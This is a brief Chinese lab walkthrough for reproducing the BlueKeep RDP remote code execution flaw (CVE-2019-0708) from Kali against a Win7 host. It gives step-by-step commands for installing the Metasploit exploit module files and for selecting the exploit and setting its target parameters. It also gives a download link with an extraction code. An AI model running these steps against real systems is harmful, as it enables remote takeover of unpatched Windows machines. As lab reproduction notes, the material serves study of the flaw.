一、漏洞介绍
二、环境准备
Kali:192.168.0.104
Win7: 192.168.0.111
三、复现过程
exp地址:
https://github.com/rapid7/metasploit-framework/pull/12283/files
更新metasploit数据库,把下列四个文件放入指定文件夹中。
rdp.rb放到/usr/share/metasploit-framework/lib/msf/core/exploit 目录
rdp_scanner.rb和cve_2019_0708_bluekeep.rb放到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp 目录
cve_2019_0708_bluekeep_rce.r放进/usr/share/metasploit-framework/modules/exploits/windows/rdp 目录,这里需要注意如果没有rdp这个目录就去创建个。
然后进入mefconsole -> reload_all ,重新加载所有模块,
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
设置参数,set rhosts&rport&target,一定别忘了set target,且确目标主机开启了3389端口,目前win7只有旗舰版可以,或者cmd里面systeminfo查看os版本,类似于下图才可以
链接:https://pan.baidu.com/s/1R8Wll7gDCyx56M82aKzpkA
提取码:um77